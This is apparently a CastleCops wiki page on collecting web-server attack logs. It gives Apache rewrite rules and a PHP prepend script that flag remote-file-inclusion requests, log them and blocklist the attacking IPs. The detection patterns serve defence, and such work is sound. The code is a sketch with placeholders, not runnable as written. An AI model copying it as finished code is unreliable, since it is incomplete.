WsIRT
From CastleCopsWiki
[edit] Server Attack Log Types
There are two different aspects of interest with attacks on servers:
- the addresses, where the actual attacks are originating from
- the addresses, where the malware, that shall be injected, is originating from
They are not so big different in that they both come from assimilated servers. But the first is dynamic with respect to the execution of attack commands, while the second is somewhat more static for this. Maybe, these two types should be distinguished because of that.
[edit] Submit Malware Logs
Please, look at the discussion page!
Currently, to submit new malware logs, you have to:
- Copy/paste the logs into the WsIRT Tool
[edit] Creating Malware Logs
To enable you to submit malware logs effectively, you should direct your server to write dedicated malware logs.
A quick-and-dirty-solution for personal webservers with apache:
LoadModule setenvif_module "modules/mod_setenvif.so"
SetEnvIfNoCase Request_URI "^/(variant|variant|...)..." is_crack
SetEnvIfNoCase Request_URI "http://" is_crack
...
CustomLog "path-to-log/cracker.log" your-logformat env=is_crack
and/or for logging in php do
LoadModule rewrite_module "modules/mod_rewrite.so"
RewriteCond %{ENV:is_crack} 1
RewriteRule "^(.*)$" "/cracker.php" [NE,L,PT,QSA]
together with a php.ini - entry of:
auto_prepend_file = "path-to-auto_prepend_file"
and an auto_prepend_file - entry of:
if (substr($_SERVER['SCRIPT_NAME'],-4) !== '.php')
{
//http://issues.apache.org/bugzilla/show_bug.cgi?id=29090
$cracktype = 'phpmiss';
include $_SERVER['DOCUMENT_ROOT'].'/cracker.php';
exit;
}
if (any-other-security-measure)
{
$cracktype = 'whatever-else-id';
include $_SERVER['DOCUMENT_ROOT'].'/cracker.php';
exit;
}
$phplogs = path-to-your-php-logs;
$cipfile = $phplogs.'cracker.txt';
$crackips = file_get_contents($cipfile);
if (strpos($crackips, $_SERVER['REMOTE_ADDR']) !== false)
{
$cracktype = 'suppressed';
include $_SERVER['DOCUMENT_ROOT'].'/cracker.php';
exit;
}
At last, in the "cracker.php", do:
// blacklist
// whatever-you-need-to-blacklist...
// whitelist
$is_me = however-you-identify-yourself;
$whitelisted = $is_me; // || whatever-else...
if ($whitelisted && $scriptname != '/cracker.php' && $cracktype != 'phpmiss') // && !blacklisted
{
// retrait from defense to execute the original file
chdir(dirname($_SERVER['SCRIPT_FILENAME']));
require $_SERVER['SCRIPT_FILENAME'];
exit;
}
// log operations with original requests (from before apache-rewrites)
$logfile = $phplogs.'cracker.log';
$request_logentry = date('Y-m-d H:i:s',$_SERVER['REQUEST_TIME']).' '.$_SERVER['REMOTE_ADDR'].' '.ip_escape($_SERVER['SCRIPT_URI'].($_SERVER['QUERY_STRING'] ? '?'.$_SERVER['QUERY_STRING'] : ''));
file_put_contents($logfile, $request_logentry.PHP_EOL, FILE_APPEND+LOCK_EX);
// log cracker ips to suppress further access by crackers, whatever they try
if (!$whitelisted)
{
$crackips = file_get_contents($cipfile);
if (strpos($crackips, $_SERVER['REMOTE_ADDR']) === false)
{
file_put_contents($cipfile, $request_logentry.PHP_EOL, FILE_APPEND+LOCK_EX);
}
}
For the best function of the entire system together with castlecops, there should be an interface at castlecops to which the script can immediately send its log entries. At the moment, it stumbles at the spam defense. We should establish a PKI interface for registered members to let reports in without the captcha.
